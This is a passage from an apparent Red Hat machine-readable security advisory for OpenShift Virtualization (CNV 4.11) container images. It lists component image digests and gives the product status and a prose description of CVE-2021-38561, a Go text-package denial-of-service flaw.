"default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", }, product_reference: "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", }, product_reference: "container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", }, product_reference: "container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", }, product_reference: "container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", }, product_reference: "container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", }, product_reference: "container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", }, product_reference: "container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", }, product_reference: "container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", }, product_reference: "container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", }, product_reference: "container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", }, product_reference: "container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", }, product_reference: "container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", }, product_reference: "container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", }, product_reference: "container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", }, product_reference: "container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", }, product_reference: "container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", }, product_reference: "container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", }, product_reference: "container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", }, product_reference: "container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64 as a component of CNV 4.11 for RHEL 8", product_id: "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", }, product_reference: "container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", relates_to_product_reference: "8Base-CNV-4.11", }, ], }, vulnerabilities: [ { cve: "CVE-2021-38561", cwe: { id: "CWE-125", name: "Out-of-bounds Read", }, discovery_date: "2022-06-23T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2100495", }, ], notes: [ { category: "description", text: "A flaw was found in golang. The language package for go language can panic due to an out-of-bounds read when an incorrectly formatted language tag is being parsed. This flaw allows an attacker to cause applications using this package to parse untrusted input data to crash, leading to a denial of service of the affected component.", title: "Vulnerability description", }, { category: "summary", text: "golang: out-of-bounds read in golang.org/x/text/language leads to DoS", title: "Vulnerability summary", }, { category: "other", text: "This flaw may be triggered only by accepting untrusted user input to the vulnerable golang's library. The overall DoS attack vector depends directly on how the library's input is exposed by the consuming application, thus Red Hat rates impact as Moderate.\n\nIn Red Hat Advanced Cluster Management for Kubernetes (RHACM) 2.5 version, the registration-operator, lighthouse-coredns, lighthouse-agent, gatekeeper-operator, and discovery-operator components are affected by this flaw, but the rest of the components are using an already patched version and are unaffected. For 2.4 and previous versions of Red Hat Advanced Cluster Management for Kubernetes (RHACM), most of the components are affected.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", 